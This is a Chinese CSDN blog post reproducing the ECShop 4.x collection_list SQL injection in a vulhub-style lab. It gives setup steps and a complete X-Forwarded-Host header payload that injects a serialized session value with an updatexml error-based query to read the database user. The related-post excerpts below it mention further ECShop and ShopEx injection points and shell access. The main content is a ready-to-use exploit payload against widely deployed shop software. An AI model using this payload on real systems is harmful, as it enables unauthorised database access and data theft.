Eecshop 4.x collection_list SQL注入 漏洞复现

最新推荐文章于 2024-05-21 19:15:40 发布
最新推荐文章于 2024-05-21 19:15:40 发布
阅读量103 收藏
点赞数 1
文章标签: java 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76467680/article/details/131385900
版权

拉取环境

访问页面

一直往下进行直至完成安装

 数据库账户密码 root/root

注册一个用户

然后点击用户中心我的收藏抓包

修改payload

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

即可

"七鹊"
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
qq_51577576的博客
10-01 1665
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
SQL-statements-Collection.rar_Grant_sql statements
09-21
下列语句部分是MsSql语句,不可以在access...SQL分类: DDL—数据定义语言(CREATE,ALTER,DROP,DECLARE) DML—数据操纵语言(SELECT,DELETE,UPDATE,INSERT) DCL—数据控制语言(GRANT,REVOKE,COMMIT,ROLLBACK)
ECShop 4.x collection_listSQL注入
weixin_56537388的博客
11-27 340
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。访问8080端口,数据库主机为mysql,账号密码为root。注册一个账户然后登录。docker环境搭建。
ecshop /category.php SQL Injection Vul
weixin_34006468的博客
05-23 127
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 Relevant Link: http://sebug.net/vuldb/ssvid-19574 2. 漏洞触发条件 0x1: POC1 http://localhost/ecshop2.7.2/catego...
(三)vulhub专栏:Ecshop Sql注入、远程代码执行漏洞复现
云舒的博客
07-05 1376
Referer值未做任何验证可被控制直接引用 采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a insert_ads函数的sql拼接不规范导致sql注入 make_val函数拼接字符串,拼接用户输入内容。......
Java_Collection_List-Set-Map.zip_list set map
09-24
Java集合排序及java集合类详解 (Collection, List, Set, Map)
SQL-grammer-collection.zip_sql语句collection
09-19
自己整理的sql语句大全,分基础部分和提升部分,提升部分涉及到很多面试时会被问到的sql语句。
gc.tar.gz_garbage_garbage collection_回收站_垃圾回收
09-20
著名的C/C++垃圾回收站
Collection-and-Map.zip_java list map
09-20
关于Map,Listcollection集合遍历,泛型等
shopex 4.8.5 SQLINJECTION注射以及后台拿SHELL
收集盒 Book box
07-09 1288
漏洞核心函数 \core\model_v5\trading\mdl.goods.php  由于是zend解密出来的 具体行数就不贴了 01 function getproducts( $gid, $pid = 0 ) //注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入 02 { 03 $sqlWhere = “”; 04 if ( 0
ecshop category.php?id=4,ecshop /category.php过滤不严导致SQL注入漏洞的修补方案
weixin_35702533的博客
03-11 301
1. 漏洞描述ecshop分类category.php过滤不严导致SQL注入漏洞2. 漏洞触发条件http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min...
ECSHOP商城系统过滤不严导致SQL注入漏洞
盐碘
03-19 1529
添加时间: 2009-05-25 系统编号: WAVDB-01431 影响版本: ECSHOP 2.6.1/2.6.2 程序介绍:  ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。 漏洞分析: 文件includes/init.php判断g
commons-collections反序列化漏洞分析——远程代码执行
qq_45766062的博客
08-17 802
这里先说说java里面的命令执行。其实java的命令执行和PHP类似,PHP一般通过eval和system来执行系统命令。java则是通过来执行系统命令。
关于ecshopsql注入漏洞修复
weixin_30439031的博客
07-20 146
ecshop系统部署在阿里云服务器上,阿里云提示Web-CMS漏洞: 修复方法如下: 1./admin/shopinfo.php 大概在第53、71、105、123行,4个地方修复方式都一样 admin_priv('shopinfo_manage'); 修改为 admin_priv('shopinfo_manage'); $_REQUEST['id'] = intv...
android高斯模糊填充imageview背景
最新发布
cf8833的博客
05-21 232
说明:最近碰到一个需求,安卓app显示在线的url图片,然后imageview没占满的部分,使用该图片的模糊背景填充。
docker中安装jenkins,并在node和cloud上跑通基于源码控制SCM的pipeline
qq_29022265的博客
05-19 1201
从安装jenkins到创建jenkins的node和cloud,最后再将scm和FreeStyle两种流水线跑通。
分布式锁2-Zookeeper分布式锁实战
qq_43676797的博客
05-19 350
使用curator操作Zookeeper进行实战;:Apache Curator包含一套高级API框架和工具类,它 是Apache ZooKeeper 的Java 客户端库。
java数据结构与算法(验证二叉搜索树)
磐门的博客
05-17 439
节点返回空为ture,节点的值不在对应数据大小范围内返回false。将验证二叉搜索树计算同样可以转换为相同子问题,所以比较适合用递归。node为root的左节点时,max更新为root.val。node为root的右节点时,min更新为root.val。
SELECT DISTINCT sd.DEVICE_NAME AS deviceName, r.STATISTICS_DATE AS xValue, r.COLLECTION_VALUE AS yValue FROM ibms_sys_device_collection_report_day r INNER JOIN ibms_sys_device sd ON r.DEVICE_ID = sd.DEVICE_ID INNER JOIN ibms_sys_device_collection dc ON r.COLLECTION_ID = dc.ID INNER JOIN ibms_sys_model_attributes ma ON dc.MODEL_ATT_ID = ma.MODEL_ATT_ID WHERE ma.DEVICE_TYPE_ATTRIBUTE_ID = 188 AND DATE_FORMAT( r.STATISTICS_DATE, '%Y-%m' ) BETWEEN '2023-05-10' and '2023-06-08' AND r.STATISTICS_DATE BETWEEN '2023-05-10' and '2023-06-08' AND FIND_IN_SET( r.DEVICE_ID,',4666,64111,68202') > 0 GROUP BY r.DEVICE_ID, r.STATISTICS_DATE 加快查询速度调优
06-10
可以考虑以下几点来加快查询速度: 1. 在 ibms_sys_device_collection_report_day 表中,可以创建统计日期(STATISTICS_DATE)和设备ID(DEVICE_ID)的联合索引,以便更快地执行日期范围过滤和设备ID筛选。 2. 在 ibms_sys_model_attributes 表中,可以创建设备类型属性ID(DEVICE_TYPE_ATTRIBUTE_ID)索引,以便更快地执行设备类型属性ID筛选。 3. 在 ibms_sys_device 表中,可以创建设备ID(DEVICE_ID)索引,以便更快地执行设备ID筛选。 4. 可以使用EXPLAIN命令来分析查询计划,查看是否有慢查询或全表扫描的情况,如果有,可以尝试调整查询条件或创建索引来优化查询。 5. 可以考虑将查询结果缓存起来,避免重复查询相同的数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值